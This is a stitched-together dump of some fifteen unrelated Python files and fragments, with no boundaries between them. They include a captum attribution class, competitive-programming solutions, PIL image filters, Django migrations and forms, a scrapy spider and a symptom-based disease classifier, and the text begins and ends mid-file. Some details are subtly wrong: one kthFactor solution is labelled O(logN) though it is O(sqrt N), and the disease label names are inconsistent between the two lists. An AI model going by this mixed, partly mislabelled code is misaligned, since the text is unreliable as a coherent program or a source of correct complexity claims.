        # an argmax of 0 for every input.  Use dim=1 so the cached value
        # matches the returned index.
        self.pred_class = torch.argmax(torch.softmax(preds, dim=1)[0])
        return torch.argmax(torch.softmax(preds, dim=1)[0]).cpu().detach().numpy()

    @property
    def predicted_class_name(self):
        """Label name for the predicted class, or the raw index if unmapped."""
        try:
            index = self.predicted_class_index
            return self.id2label[int(index)]
        except ValueError:
            return self.predicted_class_index

    def visualize(self, html_filepath: str = None, true_class: str = None):
        """Render the attributions with captum; optionally save them as HTML."""
        # Strip the BPE word-boundary marker for display purposes.
        tokens = [token.replace("Ġ", "") for token in self.decode(self.input_ids)]
        attr_class = self.id2label[int(self.selected_index)]
        if true_class is None:
            true_class = self.predicted_class_name
        score_viz = self.attributions.visualize_attributions(
            self.pred_probs,
            self.predicted_class_name,
            true_class,
            attr_class,
            self.text,
            tokens,
        )
        html = viz.visualize_text([score_viz])
        if html_filepath:
            if not html_filepath.endswith(".html"):
                html_filepath = html_filepath + ".html"
            with open(html_filepath, "w") as html_file:
                html_file.write(html.data)

    def _calculate_attributions(self, index: int = None, class_name: str = None):
        """Compute LIG attributions for the selected (or predicted) class."""
        (
            self.input_ids,
            self.ref_input_ids,
            self.sep_idx,
        ) = self._make_input_reference_pair(self.text)

        # Resolve which class to attribute: explicit index > label name >
        # the model's own prediction.
        if index is not None:
            self.selected_index = index
        elif class_name is not None:
            if class_name in self.label2id.keys():
                self.selected_index = self.label2id[class_name]
            else:
                s = f"'{class_name}' is not found in self.label2id keys."
                s += "Defaulting to predicted index instead."
                warnings.warn(s)
                self.selected_index = self.predicted_class_index
        else:
            self.selected_index = self.predicted_class_index

        if self.attribution_type == "lig":
            # NOTE(review): reaches into `<prefix>.embeddings` directly;
            # `self.model.get_input_embeddings()` may be the more portable way.
            embeddings = getattr(self.model, self.model_prefix).embeddings
            reference_tokens = [
                token.replace("Ġ", "") for token in self.decode(self.input_ids)
            ]
            lig = LIGAttributions(
                self._forward,
                embeddings,
                reference_tokens,
                self.input_ids,
                self.ref_input_ids,
                self.sep_idx,
            )
            lig.summarize()
            self.attributions = lig
        else:
            pass

    def __call__(self, text: str = None, index: int = None, class_name: str = None):
        """Alias for run()."""
        return self.run(text, index, class_name)

    def __str__(self):
        s = f"{self.__class__.__name__}("
        s += f'\n\ttext="{str(self.text[:10])}...",'
        s += f"\n\tmodel={self.model.__class__.__name__},"
        s += f"\n\ttokenizer={self.tokenizer.__class__.__name__},"
        s += f"\n\tattribution_type='{self.attribution_type}',"
        s += ")"
        return s
# Baekjoon 1182 — given a sequence of N integers, count the non-empty
# subsequences whose elements sum to S.
#
# Input:  first line N and S (1 <= N <= 40, |S| <= 1,000,000);
#         second line the N integers (|a_i| <= 100,000).
# Output: the number of subsequences summing to S.
#
# N can be as large as 40, so the naive O(2^N) recursion is infeasible in the
# worst case; meet-in-the-middle brings it down to O(2^(N/2)) per half.
from sys import stdin
from collections import Counter


def _subset_sums(arr):
    """Return a Counter mapping each subset sum of *arr* (incl. empty) to its count."""
    sums = [0]
    for x in arr:
        # Every existing subset either excludes or includes x.
        sums += [s + x for s in sums]
    return Counter(sums)


def count_subsequences(nums, target):
    """Count the non-empty subsequences of *nums* that sum to *target*."""
    half = len(nums) // 2
    left = _subset_sums(nums[:half])
    right = _subset_sums(nums[half:])
    # A full subsequence is any left subset paired with a right subset whose
    # sums add up to target.
    total = sum(cnt * right[target - s] for s, cnt in left.items())
    if target == 0:
        # Both halves empty gives sum 0 — exclude the empty subsequence,
        # as the problem requires positive length.
        total -= 1
    return total


if __name__ == '__main__':
    N, S = map(int, stdin.readline().rstrip().split())
    nums = list(map(int, stdin.readline().rstrip().split()))
    print(count_subsequences(nums, S))
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import six

from .utils import package_names_match


class Fetcher(six.Iterator):
    """Base fetch implementation to apply requirement filtering."""

    def __init__(self, repository, package_name):
        self._repository = repository
        self._package_name = package_name

    def __repr__(self):
        return "Fetcher({endpoint!r}, {package_name!r})".format(
            endpoint=self._repository.base_endpoint.value,
            package_name=self._package_name,
        )

    def __iter__(self):
        return self

    def __aiter__(self):
        return self

    def iter_endpoints(self):
        # Endpoint discovery is delegated entirely to the repository.
        yield from self._repository.iter_endpoints(self._package_name)

    def iter_entries(self, endpoint, source):
        # Only surface entries whose name matches the package being fetched.
        wanted = self._package_name
        for candidate in self._repository.get_entries(wanted, endpoint, source):
            if package_names_match(candidate.name, wanted):
                yield candidate
# 03_02-Callable Instances from resolver import Resolver resolve = Resolver() resolve('localhost') resolve.__call__('localhost') resolve._cache resolve('sixty-north.com') resolve.__call__('sixty-north.com') resolve._cache resolve('pluralsight.com') resolve._cache from timeit import timeit timeit(setup='from __main__ import resolve', stmt="resolve('localhost')", number=1) timeit(setup='from __main__ import resolve', stmt="resolve('localhost')", number=1) timeit(setup='from __main__ import resolve', stmt="resolve('python.org')", number=1) timeit(setup='from __main__ import resolve', stmt="resolve('python.org')", number=1) print("{:f}".format(_)) exit() from resolver import Resolver resolve = Resolver() resolve.has_host('localhost') resolve('localhost') resolve.has_host('localhost') resolve.clear() resolve.has_host('localhost') resolve.has_host('pluralsight.com') resolve('pluralsight.com') resolve.has_host('pluralsight.com') resolve.clear() resolve.has_host('pluralsight.com')
""" Trainer to create a model """ # import json # import logging from pandas import DataFrame from sklearn.model_selection import train_test_split import xgboost as xgb from infrastructure.data_mining.xgboost.XGBRegresser import XGBRegresser class XGBoostDataTrainer: EARLY_STOP = 50 RANDOM_STATE = 42 VAL_RATIO = 0.3 def __init__(self, regresser: XGBRegresser): self._regresser = regresser def train(self, data_frame: DataFrame, params: list = None): data_y = data_frame.iloc[:, 0] data_x = data_frame.iloc[:, 1:] x_train, x_val, y_train, y_val = train_test_split(data_x, data_y, test_size=self.VAL_RATIO, random_state=self.RANDOM_STATE) data_train = xgb.DMatrix(x_train, y_train) data_validate = xgb.DMatrix(x_val, y_val) watchlist = [(data_train, 'train'), (data_validate, 'validate')] # if params is None: # params = self._regresser.randomized_search_cv(x_train, y_train, data_x, data_y) # logging.critical(json.dumps(params)) params = {'objective': 'reg:linear', 'subsample': 0.8, 'colsample_bytree': 0.85, 'seed': 42, 'max_depth': 23, 'n_estimators': 364} return xgb.train(params, data_train, evals=watchlist, early_stopping_rounds=self.EARLY_STOP,)
# Name: Efi Pecani
# ID: 307765230
from tkinter import *
import tkinter as tk
from tkinter import filedialog
from tkinter import ttk
from PIL import ImageTk , ImageFilter
from PIL import Image
import os, sys
import tkinter.font as tkFont

# Every transform below follows the same contract: when targetImagePath is a
# non-empty string the result is saved there (and "saved" is printed); when it
# is "" the new Image object is returned instead.


#_________________________________________________
def rotatePicture(sourceImagePath, targetImagePath):
    """Rotate the image by 180 degrees (flip both axes)."""
    im = Image.open(sourceImagePath)
    w, h = im.size
    new = im.copy()
    mat = im.load()
    mat_new = new.load()
    for i in range(w):
        for j in range(h):
            mat_new[i, j] = mat[w - i - 1, h - j - 1]
    if targetImagePath != "":
        new.save(targetImagePath)
        print("saved")
    else:
        return new


#_________________________________________________
def mirrorPicture(sourceImagePath, targetImagePath):
    """Mirror the image horizontally (left-right flip)."""
    im = Image.open(sourceImagePath)
    w, h = im.size
    new = im.copy()
    mat = im.load()
    mat_new = new.load()
    for i in range(w):
        for j in range(h):
            mat_new[i, j] = mat[w - i - 1, j]
    if targetImagePath != "":
        new.save(targetImagePath)
        print("saved")
    else:
        return new


#_________________________________________________
def resizePicture(sourceImagePath, targetImagePath):
    """Downscale a grayscale copy to half size by averaging each 2x2 block."""
    im = Image.open(sourceImagePath).convert('L')
    w, h = im.size
    mat = im.load()
    newpic = Image.new('L', (int(w / 2), int(h / 2)))
    newmat = newpic.load()
    for x in range(int(w / 2)):
        for y in range(int(h / 2)):
            # Bug fix: the original computed a + b + c + d//4 (only the last
            # pixel was divided); average the whole 2x2 block.
            newmat[x, y] = (mat[x * 2, y * 2] + mat[x * 2 + 1, y * 2]
                            + mat[x * 2, y * 2 + 1] + mat[x * 2 + 1, y * 2 + 1]) // 4
    if targetImagePath != "":
        newpic.save(targetImagePath)
    else:
        return newpic


#_________________________________________________
def edge(sourceImagePath, targetImagePath, threshold):
    """Binary edge detection on a grayscale copy.

    A pixel becomes white (255) when the brightness difference to its right
    or upper neighbour exceeds *threshold*, otherwise black (0).
    """
    im = Image.open(sourceImagePath).convert('L')
    w, h = im.size
    data = im.load()
    new = Image.new('L', (w, h))
    newdata = new.load()
    for i in range(w - 1):
        for j in range(1, h):
            if (abs(data[i, j] - data[i + 1, j]) > threshold
                    or abs(data[i, j] - data[i, j - 1]) > threshold):
                newdata[i, j] = 255
            else:
                newdata[i, j] = 0
    if targetImagePath != "":
        new.save(targetImagePath)
        print("saved")
    else:
        return new


#_________________________________________________
def MyAlgorithm1(sourceImagePath, targetImagePath):
    """Primary-colors poster effect: quantize each RGB channel to 0 or 255."""
    im = Image.open(sourceImagePath)
    width, height = im.size
    new = Image.new("RGB", (width, height), "white")
    pixels = new.load()
    for i in range(width):
        for j in range(height):
            pixel = get_pixel(im, i, j)
            # Snap each channel to whichever extreme it is closer to.
            red = 255 if pixel[0] > 127 else 0
            green = 255 if pixel[1] > 127 else 0
            blue = 255 if pixel[2] > 127 else 0
            pixels[i, j] = (int(red), int(green), int(blue))
    if targetImagePath != "":
        new.save(targetImagePath)
        print("saved")
    else:
        return new


#_________________________________________________
def MyAlgorithm2(sourceImagePath, targetImagePath):
    """Half-tone effect: each 2x2 block is redrawn with 0-4 black pixels
    according to its average luminance."""
    im = Image.open(sourceImagePath)
    width, height = im.size
    new = Image.new("RGB", (width, height), "white")
    pixels = new.load()
    WHITE, BLACK = (255, 255, 255), (0, 0, 0)
    # (threshold, pattern) pairs, brightest first; pattern order is
    # (i,j), (i,j+1), (i+1,j), (i+1,j+1).
    bands = [
        (223, (WHITE, WHITE, WHITE, WHITE)),
        (159, (WHITE, BLACK, WHITE, WHITE)),
        (95,  (WHITE, BLACK, BLACK, WHITE)),
        (32,  (BLACK, WHITE, BLACK, BLACK)),
        (-1,  (BLACK, BLACK, BLACK, BLACK)),
    ]
    # Bug fix: stop one short of the edge so i+1 / j+1 never run past the
    # image on odd dimensions (the original indexed out of bounds there).
    for i in range(0, width - 1, 2):
        for j in range(0, height - 1, 2):
            block = (get_pixel(im, i, j), get_pixel(im, i, j + 1),
                     get_pixel(im, i + 1, j), get_pixel(im, i + 1, j + 1))
            # Average grayscale luminance (ITU-R 601 weights) of the block.
            sat = sum(p[0] * 0.299 + p[1] * 0.587 + p[2] * 0.114 for p in block) / 4
            for threshold, pattern in bands:
                if sat > threshold:
                    pixels[i, j], pixels[i, j + 1] = pattern[0], pattern[1]
                    pixels[i + 1, j], pixels[i + 1, j + 1] = pattern[2], pattern[3]
                    break
    if targetImagePath != "":
        new.save(targetImagePath)
        print("saved")
    else:
        return new


#_________________________________________________
def _apply_filter(sourceImagePath, targetImagePath, image_filter):
    """Shared helper: open the image, apply a PIL filter, save or return."""
    im = Image.open(sourceImagePath)
    new = im.copy().filter(image_filter)
    if targetImagePath != "":
        new.save(targetImagePath)
        print("saved")
    else:
        return new


def gaussBlur(sourceImagePath, targetImagePath):
    """Heavy Gaussian blur (radius 20)."""
    return _apply_filter(sourceImagePath, targetImagePath, ImageFilter.GaussianBlur(20))


#_________________________________________________
def minFilter(sourceImagePath, targetImagePath):
    """Minimum filter with a 7x7 window (darkens / erodes bright detail)."""
    fact = 7
    return _apply_filter(sourceImagePath, targetImagePath, ImageFilter.MinFilter(fact))


#_________________________________________________
def sharpen(sourceImagePath, targetImagePath):
    """Unsharp-mask sharpening with PIL's default settings."""
    return _apply_filter(sourceImagePath, targetImagePath, ImageFilter.UnsharpMask)


#_________________________________________________
def contour(sourceImagePath, targetImagePath):
    """Contour (outline) filter."""
    return _apply_filter(sourceImagePath, targetImagePath, ImageFilter.CONTOUR)


#_________________________________________________
def detail(sourceImagePath, targetImagePath):
    """Detail-enhancing filter."""
    return _apply_filter(sourceImagePath, targetImagePath, ImageFilter.DETAIL)


#_________________________________________________
def edgeEnhanceMore(sourceImagePath, targetImagePath):
    """Strong edge-enhancement filter."""
    return _apply_filter(sourceImagePath, targetImagePath, ImageFilter.EDGE_ENHANCE_MORE)


#_________________________________________________
def emboss(sourceImagePath, targetImagePath):
    """Emboss filter."""
    return _apply_filter(sourceImagePath, targetImagePath, ImageFilter.EMBOSS)


#_________________________________________________
def kernelSmooth(sourceImagePath, targetImagePath):
    """Smoothing via an explicit 3x3 Gaussian-like convolution kernel."""
    return _apply_filter(sourceImagePath, targetImagePath,
                         ImageFilter.Kernel((3, 3), [1, 2, 1, 2, 4, 2, 1, 2, 1], 16))


#_________________________________________________
'''@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Auxilary Functions @@@@@@@@@@'''
#_________________________________________________
def add(sourceImagePath, k):
    """Brighten a grayscale copy of the image by *k*, clamped to 8-bit range."""
    im = Image.open(sourceImagePath).convert('L')
    w, h = im.size
    new = im.copy()
    mat = im.load()
    mat_new = new.load()
    for x in range(w):
        for y in range(h):
            # Bug fix: the maximum 8-bit gray value is 255, not 256.
            mat_new[x, y] = min(mat[x, y] + k, 255)
    return new


#_______________________________________
def open_image(path):
    """Open and return the image at *path*.

    Bug fix: the original ignored *path* and always opened './my_image.jpg'.
    """
    return Image.open(path)


#_______________________________________
def save_image(image, path):
    """Save *image* to *path* as JPEG.

    Bug fix: Pillow expects the format name 'JPEG'; 'jpg' is rejected.
    """
    image.save(path, 'JPEG')
#_______________________________________
def create_image(i, j):
    """Create and return a new white RGB image of size i x j."""
    image = Image.new("RGB", (i, j), "white")
    return image
#_______________________________________
def get_pixel(image, i, j):
    """Return pixel (i, j) of *image*, or None when out of bounds."""
    width, height = image.size
    # Bug fix: valid coordinates are 0..width-1 / 0..height-1, so the guard
    # must use >= — the original `i > width` let i == width slip through and
    # getpixel raised IndexError instead of returning None.
    if i >= width or j >= height:
        return None
    # get Pixel
    pixel = image.getpixel((i, j))
    return pixel
#_______________________________________
# Demo paths and manual test calls — uncomment one at a time to try a filter.
path = "./my_image1.jpg"
target = "./newIm.jpg"
#newIm = rotatePicture(path, target)   # works
#newIm = mirrorPicture(path, target)   # works
#newIm = edge(path, target, 15)        # works
#newIm = gaussBlur(path, target)       # works
#newIm = resizePicture(path, "")       # works
#newIm.show()
# Convert the money in the user's wallet from Brazilian reais to US dollars.
# Bug fix: the original read the amount with int(input(...)), which crashed
# on any value with cents such as "50.75" — read a float instead.
r = float(input('Quanto dinheiro você tem na carteira?R$'))
d = r / 5.20  # fixed BRL -> USD exchange rate
# {r:.2f} keeps the echoed amount formatted as currency now that it is a float.
print(f'Com R${r:.2f} você pode comprar ${d:.2f} doláres')
from pathlib import Path
import os

from loop_directory import loop_bulks


def loop_folders(chunks: list, Archived=False):
    """Feed every batch of paths to loop_bulks."""
    for batch in chunks:
        loop_bulks(batch, Archived)


def chunks(paths: list, n):
    """Split *paths* into consecutive pieces of at most *n* items each."""
    pieces = []
    for start in range(0, len(paths), n):
        pieces.append(paths[start:start + n])
    return pieces


if __name__ == '__main__':
    data_dir = Path.cwd() / 'dl'

    # Archived exports go through in small batches of 5.
    archived_paths = list(data_dir.glob('**/ARCHIVE_SALES_*.dat'))
    archived_chunks = chunks(archived_paths, 5)

    # Current exports go through in large batches of 1000.
    current_paths = list(data_dir.glob('**/*_SALES_DATA_*.dat'))
    current_chunks = chunks(current_paths, 1000)

    loop_folders(archived_chunks, True)
    loop_folders(current_chunks)

    # Three files under 2019/2019708 are named differently from the rest:
    # ['656_SALES_DATA_08072019', '666_SALES_DATA_08072019', '708_SALES_DATA_08072019']
# Generated by Django 2.0.2 on 2018-02-19 03:52 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('weblog', '0001_initial'), ] operations = [ migrations.AlterField( model_name='author', name='email', field=models.EmailField(blank=True, max_length=254), ), migrations.AlterField( model_name='blog', name='tagline', field=models.TextField(blank=True), ), migrations.AlterField( model_name='entry', name='authors', field=models.ManyToManyField(blank=True, to='weblog.Author'), ), migrations.AlterField( model_name='entry', name='mod_date', field=models.DateField(auto_now=True), ), migrations.AlterField( model_name='entry', name='n_comments', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='entry', name='n_pingbacks', field=models.IntegerField(default=0), ), migrations.AlterField( model_name='entry', name='rating', field=models.IntegerField(default=0), ), ]
'''
Heap sort (in-place, max-heap based).
'''
def sort(array):
    # Build the max-heap: walk the non-leaf nodes from the last one up to the root.
    for i in range(int(len(array) / 2) - 1, -1, -1):
        adjustHeap(array, i, len(array))
    print('arr of heap:', array)
    # Heap built — now sort.
    for j in range(len(array) - 1, 0, -1):
        # The maximum element sits at [0]; swap it to the end of the unsorted
        # region, then re-heapify the shrunken prefix so the next largest
        # element (2nd, 3rd, ... n-th) bubbles back to the top.
        array[0], array[j] = array[j], array[0]
        adjustHeap(array, 0, j)


def adjustHeap(array, i, length):
    # Sift node i down so the subtree rooted at i satisfies the max-heap property.
    temp = array[i]   # the value being placed
    # Left child of a non-leaf node i.
    k = 2 * i + 1
    # Walk down the children of k, moving larger children up until temp fits.
    while k < length:
        # k + 1 < length: compare children only when a right child exists.
        if k + 1 < length and array[k] < array[k + 1]:
            # The right child is larger — follow it instead.
            k += 1
        # If this child is larger than temp...
        if array[k] > temp:
            # ...promote the child into the parent slot...
            array[i] = array[k]
            # ...and remember the hole it left behind.
            i = k
        else:
            # Heap property holds below this point; by the heap shape the
            # deeper levels cannot violate it either, so stop early.
            break
        # Descend to the next left child.
        k = 2 * k + 1
    # i is now the hole where temp belongs (everything above it is >= temp).
    array[i] = temp


print('<iframe src="//player.bilibili.com/player.html?aid=328695051&bvid=BV1qA411i7pb&cid=207978874&page=1" scrolling="no" border="0" frameborder="no" framespacing="0" allowfullscreen="true"> </iframe>')

if __name__ == '__main__':
    data = [16, 25, 39, 27, 12, 8, 45, -10, 63]
    print('arr', data)
    print('start max heap sort')
    sort(data)
    print('arr sorted:', data)


# ------------------------------------------------------------------------------
# Second version: get the k smallest elements using a bounded max-heap.
class Solution4:
    @staticmethod
    def swap(nums, i, j):
        # Exchange two elements of nums in place.
        nums[i], nums[j] = nums[j], nums[i]

    def heapify(self, nums, i, size):
        # Sift node i down within nums[:size] to restore the max-heap property.
        # With 0-based indexing, the children of i are 2i+1 and 2i+2.
        left, right = 2 * i + 1, 2 * i + 2
        largest = i
        # left < size means a left child exists.
        if left < size and nums[left] > nums[largest]:
            largest = left
        if right < size and nums[right] > nums[largest]:
            largest = right
        if largest != i:
            # After this swap the subtree's maximum sits at its root; recurse
            # to repair the subtree the old root value was pushed into.
            self.swap(nums, i, largest)
            self.heapify(nums, largest, size)

    def build_heap(self, nums, k):
        # Heapify from the last non-leaf node down to the root.
        for i in range(k // 2 - 1, -1, -1):
            self.heapify(nums, i, k)

    def getLeastNumbers(self, arr, k: int):
        # Return the k smallest elements of arr (in heap order, not sorted).
        if not arr or k <= 0:
            return []
        if len(arr) <= k:
            return arr
        heap = arr[:k]
        self.build_heap(heap, k)
        for i in range(k, len(arr)):
            # Any element smaller than the current heap maximum displaces it.
            if arr[i] < heap[0]:
                heap[0] = arr[i]
                self.heapify(heap, 0, k)
        return heap
# Time-complexity: O(N)
class Solution:
    def kthFactor(self, n: int, k: int) -> int:
        """Return the k-th smallest factor of n, or -1 when n has fewer than k factors."""
        if k == 1:
            return 1  # 1 divides everything and is always the first factor
        found = 1  # factor 1 already accounted for
        divisor = 2
        # Every factor other than n itself is at most n // 2.
        while divisor * 2 <= n:
            if n % divisor == 0:
                found += 1
                if found == k:
                    return divisor
            divisor += 1
        # n itself is the last factor; it is the answer iff it is the k-th one.
        return n if found + 1 == k else -1


# Time-complexity: O(logN)
class Solution:
    def kthFactor(self, n: int, k: int) -> int:
        """Return the k-th smallest factor of n via O(sqrt n) divisor pairing."""
        root = int(n ** 0.5)
        # All factors up to sqrt(n), in increasing order.
        small = [d for d in range(1, root + 1) if n % d == 0]
        if k <= len(small):
            return small[k - 1]
        # Each small divisor d pairs with the large factor n // d; skip an
        # exact square root so it is not counted twice.  Reversing the small
        # list keeps the large factors in increasing order.
        large = [n // d for d in reversed(small) if d * d != n]
        k -= len(small)
        return large[k - 1] if k <= len(large) else -1
# -*- coding: utf-8 -*-
import scrapy
import io
import sys
import os
from scrapy.selector import HtmlXPathSelector
from ..items import Sp1Item
from scrapy.http import Request

# Re-wrap stdout so the scraped Chinese text can be printed on consoles
# that default to a narrower encoding.
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='gb18030')


class ChoutiSpider(scrapy.Spider):
    """Spider that collects share-title / share-pic pairs from dig.chouti.com."""

    name = 'chouti'
    allowed_domains = ['chouti.com']
    start_urls = ['http://dig.chouti.com/']

    def parse(self, response):
        # Each story lives in a div.item inside the #content-list container.
        selector = HtmlXPathSelector(response)
        for node in selector.select('//div[@id="content-list"]/div[@class="item"]'):
            title = node.select('./div[@class="news-content"]/div[@class="part2"]/@share-title').extract_first()
            url = node.select('./div[@class="news-content"]/div[@class="part2"]/@share-pic').extract_first()
            yield Sp1Item(title=title, url=url)
from django import forms
from cb.models import User


class UserForm(forms.ModelForm):
    # ModelForm exposing the basic User credential fields with Chinese UI
    # labels (name -> "username", password -> "password", email -> "e-mail").
    class Meta:
        model = User
        fields = ['name', 'password', 'email']
        labels = {'name':'用戶名', 'password':'密碼', 'email':'郵箱'}
from django.contrib import admin

from .models import Post, calci, book, books

# Make every model of this app manageable through the Django admin site.
for model in (Post, calci, book, books):
    admin.site.register(model)
# Build RadLex unigram and bigram vocabularies from the RadLex CSV export and
# pickle them.  Tokens are ASCII-folded, lower-cased, de-duplicated, and
# filtered against the NLTK English stopword list (and pure digits for
# unigrams).  Output: radlex_terms.pkl with keys '1word' and '2word'.
import csv, pickle
from nltk.corpus import stopwords

stwords = stopwords.words('english')

radlex_terms_1word = []
radlex_terms_2word = []

# Performance fix: the original tested membership against the growing lists
# (O(n) per lookup -> quadratic overall).  These sets mirror the lists purely
# for O(1) dedup checks; the lists still hold the results in original order.
_seen_1word = set()
_seen_2word = set()
_stword_set = set(stwords)

with open('./radlex/Radlex.csv') as csvfile:
    lexreader = csv.reader(csvfile, delimiter=',')
    for row in lexreader:
        tokens = row[0].split()

        # --- unigrams ---
        for rowi in tokens:
            try:
                rowia = rowi.rstrip().encode('ascii', 'ignore').lower()
            except:
                # Keep the original best-effort behavior: skip tokens that
                # cannot be normalised.
                continue
            if (rowia not in _seen_1word and rowia not in _stword_set
                    and not rowia.isdigit()):
                _seen_1word.add(rowia)
                radlex_terms_1word.append(rowia)

        # --- bigrams (adjacent token pairs) ---
        for rid in range(len(tokens) - 1):
            rowi2 = ' '.join(tokens[rid:rid + 2])
            try:
                rowi2a = rowi2.rstrip().encode('ascii', 'ignore').lower()
            except:
                continue
            if rowi2a in _seen_2word:
                continue
            # Drop any bigram containing a stopword.
            if any(part in _stword_set for part in rowi2a.split()):
                continue
            _seen_2word.add(rowi2a)
            radlex_terms_2word.append(rowi2a)

radlex_terms = {'1word': radlex_terms_1word, '2word': radlex_terms_2word}
with open('radlex_terms.pkl', 'wb') as handle:
    pickle.dump(radlex_terms, handle)
from tkinter import *
import numpy as np
import pandas as pd
from PIL import ImageTk, Image
from tkinter import filedialog

# Age choices offered in the GUI dropdown: '0' .. '70' as strings
# (was a hand-written 71-element literal list).
AGE = [str(i) for i in range(71)]
GENDER = ['MALE', 'FEMALE']

# Symptom feature names.  These must match the CSV column headers exactly,
# including the odd entries 'foul_smell_of urine' and 'dischromic _patches'
# and the duplicated 'fluid_overload' -- do not "fix" their spelling without
# changing the data files too.
SYMPTOMPS = ['back_pain', 'constipation', 'abdominal_pain', 'diarrhoea', 'mild_fever', 'yellow_urine',
             'yellowing_of_eyes', 'acute_liver_failure', 'fluid_overload', 'swelling_of_stomach',
             'swelled_lymph_nodes', 'malaise', 'blurred_and_distorted_vision', 'phlegm', 'throat_irritation',
             'redness_of_eyes', 'sinus_pressure', 'runny_nose', 'congestion', 'chest_pain', 'weakness_in_limbs',
             'fast_heart_rate', 'pain_during_bowel_movements', 'pain_in_anal_region', 'bloody_stool',
             'irritation_in_anus', 'neck_pain', 'dizziness', 'cramps', 'bruising', 'obesity', 'swollen_legs',
             'swollen_blood_vessels', 'puffy_face_and_eyes', 'enlarged_thyroid', 'brittle_nails',
             'swollen_extremeties', 'excessive_hunger', 'extra_marital_contacts', 'drying_and_tingling_lips',
             'slurred_speech', 'knee_pain', 'hip_joint_pain', 'muscle_weakness', 'stiff_neck', 'swelling_joints',
             'movement_stiffness', 'spinning_movements', 'loss_of_balance', 'unsteadiness',
             'weakness_of_one_body_side', 'loss_of_smell', 'bladder_discomfort', 'foul_smell_of urine',
             'continuous_feel_of_urine', 'passage_of_gases', 'internal_itching', 'toxic_look_(typhos)',
             'depression', 'irritability', 'muscle_pain', 'altered_sensorium', 'red_spots_over_body', 'belly_pain',
             'abnormal_menstruation', 'dischromic _patches', 'watering_from_eyes', 'increased_appetite',
             'polyuria', 'family_history', 'mucoid_sputum',
             'rusty_sputum', 'lack_of_concentration', 'visual_disturbances', 'receiving_blood_transfusion',
             'receiving_unsterile_injections', 'coma', 'stomach_bleeding', 'distention_of_abdomen',
             'history_of_alcohol_consumption', 'fluid_overload', 'blood_in_sputum', 'prominent_veins_on_calf',
             'palpitations', 'painful_walking', 'pus_filled_pimples', 'blackheads', 'scurring', 'skin_peeling',
             'silver_like_dusting', 'small_dents_in_nails', 'inflammatory_nails', 'blister', 'red_sore_around_nose',
             'yellow_crust_ooze']

# Target classes, indexed by the integer codes used in the prognosis column.
# NOTE(review): spellings ('Peptic ulcer diseae', 'Heartattack', leading
# space in ' Migraine') are kept as-is -- they are the display strings.
disease = ['Fungal infection', 'Allergy', 'GERD', 'Chronic cholestasis', 'Drug Reaction',
           'Peptic ulcer diseae', 'AIDS', 'Diabetes', 'Gastroenteritis', 'Bronchial Asthma', 'Hypertension',
           ' Migraine', 'Cervical spondylosis',
           'Paralysis (brain hemorrhage)', 'Jaundice', 'Malaria', 'Chicken pox', 'Dengue', 'Typhoid', 'hepatitis A',
           'Hepatitis B', 'Hepatitis C', 'Hepatitis D', 'Hepatitis E', 'Alcoholic hepatitis', 'Tuberculosis',
           'Common Cold', 'Pneumonia', 'Dimorphic hemmorhoids(piles)',
           'Heartattack', 'Varicoseveins', 'Hypothyroidism', 'Hyperthyroidism', 'Hypoglycemia', 'Osteoarthristis',
           'Arthritis', '(vertigo) Paroymsal Positional Vertigo', 'Acne', 'Urinary tract infection', 'Psoriasis',
           'Impetigo']

# Binary feature vector (one slot per symptom) filled in before predicting
# (was an append loop).
l2 = [0] * len(SYMPTOMPS)

# Held-out data.  NOTE(review): variable is tersely named `tr` but the file
# loaded here (Symptom_Testing.csv) is used downstream as the TEST set.
tr = pd.read_csv("Symptom_Testing.csv")
# Encode the prognosis label as the integer class code; some keys carry a
# trailing space ('Diabetes ', 'Hypertension ') to match the CSV contents.
tr.replace({'prognosis': {'Fungal infection': 0, 'Allergy': 1, 'GERD': 2, 'Chronic cholestasis': 3, 'Drug Reaction': 4,
                          'Peptic ulcer diseae': 5, 'AIDS': 6, 'Diabetes ': 7, 'Gastroenteritis': 8, 'Bronchial Asthma': 9, 'Hypertension ': 10,
                          'Migraine': 11, 'Cervical spondylosis': 12,
                          'Paralysis (brain hemorrhage)': 13, 'Jaundice': 14, 'Malaria': 15, 'Chicken pox': 16, 'Dengue': 17, 'Typhoid': 18, 'hepatitis A': 19,
                          'Hepatitis B': 20, 'Hepatitis C': 21, 'Hepatitis D': 22, 'Hepatitis E': 23, 'Alcoholic hepatitis': 24, 'Tuberculosis': 25,
                          'Common Cold': 26, 'Pneumonia': 27, 'Dimorphic hemmorhoids(piles)': 28, 'Heart attack': 29, 'Varicose veins': 30, 'Hypothyroidism': 31,
                          'Hyperthyroidism': 32, 'Hypoglycemia': 33, 'Osteoarthristis': 34, 'Arthritis': 35,
                          '(vertigo) Paroymsal Positional Vertigo': 36, 'Acne': 37, 'Urinary tract infection': 38, 'Psoriasis': 39,
                          'Impetigo': 40}}, inplace=True)
# Held-out evaluation data: feature matrix and encoded prognosis labels.
X_test = tr[SYMPTOMPS]
y_test = tr[["prognosis"]]

# Training data (df), with the same label -> class-code encoding as `tr`.
df = pd.read_csv("Symptom_Training.csv")
df.replace({'prognosis': {'Fungal infection': 0, 'Allergy': 1, 'GERD': 2, 'Chronic cholestasis': 3, 'Drug Reaction': 4,
                          'Peptic ulcer diseae': 5, 'AIDS': 6, 'Diabetes ': 7, 'Gastroenteritis': 8, 'Bronchial Asthma': 9, 'Hypertension ': 10,
                          'Migraine': 11, 'Cervical spondylosis': 12,
                          'Paralysis (brain hemorrhage)': 13, 'Jaundice': 14, 'Malaria': 15, 'Chicken pox': 16, 'Dengue': 17, 'Typhoid': 18, 'hepatitis A': 19,
                          'Hepatitis B': 20, 'Hepatitis C': 21, 'Hepatitis D': 22, 'Hepatitis E': 23, 'Alcoholic hepatitis': 24, 'Tuberculosis': 25,
                          'Common Cold': 26, 'Pneumonia': 27, 'Dimorphic hemmorhoids(piles)': 28, 'Heart attack': 29, 'Varicose veins': 30, 'Hypothyroidism': 31,
                          'Hyperthyroidism': 32, 'Hypoglycemia': 33, 'Osteoarthristis': 34, 'Arthritis': 35,
                          '(vertigo) Paroymsal Positional Vertigo': 36, 'Acne': 37, 'Urinary tract infection': 38, 'Psoriasis': 39,
                          'Impetigo': 40}}, inplace=True)

X = df[SYMPTOMPS]
y = df[["prognosis"]]


def _symptom_vector():
    """Return [l2] rebuilt from the five symptom dropdowns.

    BUGFIX: the original never cleared l2 between predictions, so symptoms
